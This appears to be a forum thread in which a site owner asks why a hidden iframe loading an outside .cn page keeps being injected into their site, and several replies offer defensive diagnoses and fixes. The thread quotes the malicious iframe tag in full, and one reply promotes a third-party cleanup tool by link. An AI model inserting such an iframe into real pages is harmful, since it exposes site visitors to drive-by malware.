I faced a website attack problem that some malicious javascript code added to all pages in my webiste.
Recently I faced another problem that my website is attacked with the following "iframe" tag.
iframe src="http://shopmovielife.cn:8080/index.php" width=127 height=167 style="visibility: hidden"
Even if I remove this tag, the index file of website is updated on daily basis. What would be the reason for this behaviour?
Please give me a solution to solve this.
It may be that one of the scripts used in your website was compromised. Try updating.
You don't really provide enough information to solve your problem.
But I guess your account credentials (e.g. ftp-password) have been compromised. Or you have some say for example vunerable php-script which allows the attacker to modifiy your files.
And you should make sure your PC isn't infected with somekind of malware, trojan, virus which possibly stole your account information in the first place
You do not really give enough information so I am kind of guessing but the problem "some malicious javascript code added to all pages in my website" I believe is a SQL Injection attack. Probably it is this one: ASCII-Encoded-Binary-String-Automated-SQL-Injection.
So my guess is that your site is still vulnerable to SQL Injection attacks and that is how the iframe code is getting put into your pages. Check your web logs to see if you notice suspicious requests. And then review all of your code (I know that is not a simple thing) to see if you are dynamically building sql statements.
Another place to mitigate this type of attack is through security... possibly you can use a different SQL account that only has read only permissions on your database.
This all assumes you are dealing with a SQL injection attack, but from the details you provided is not 100% clear what is going on.
-Jeff
the reason is a poor choice in platform and/or code. the solutions depends on your code and you have not provided enough details for an answer. short answer: tighten your security, upgrade your software, reset your passwords and do not use form variables to build strings you pass to external applications, SQL or eval() type functions.
So how do you update your site? ftp, sharepoint, etc? The daily reinfection may be from the following scenario.
I've seen where a rootkit on a dev box has harvested your credentials for updating the site. So malware would be active on your dev box and it gets your ftp or sharepoint password from your box when you update your site.
So, you go put a clean page up, then the malware network logs into your site at some later date and adds the iframe code back in without you ever knowing.
In case that might be the situation, you should scan the heck out of your dev box with Malwarebytes, SuperAntiSpyware Free, or whatever legit tools you can get. The more the better since some miss what others catch.
So AFTER you are pretty confident your own dev box is clean, then change your password on your FTP, frontpage, sharepoint, whatever. Once you have changed your credentials to your site update mechanism, THEN go upload a clean version of your pages, and wait and see what happens the next day. If the malware network tries to get to your site ftp with your old password, it won't be able to authenticate.
If that happen often, i advice you to watch out your server with Iframe.attack software, the soft is looking for all the iframe on your serveur and it can delete them easearly. that work well for me. And in same time i try to keep my computer clean by antivirus scan every day and also i stop to use filezilla (just in case), i use alternative homemade FTP client. Good luck with this. (sorry for my english...)
The link to iframe.attack soft : http://kawablog.com/scarabox/product.php?id_produit=1&lng=en work's for me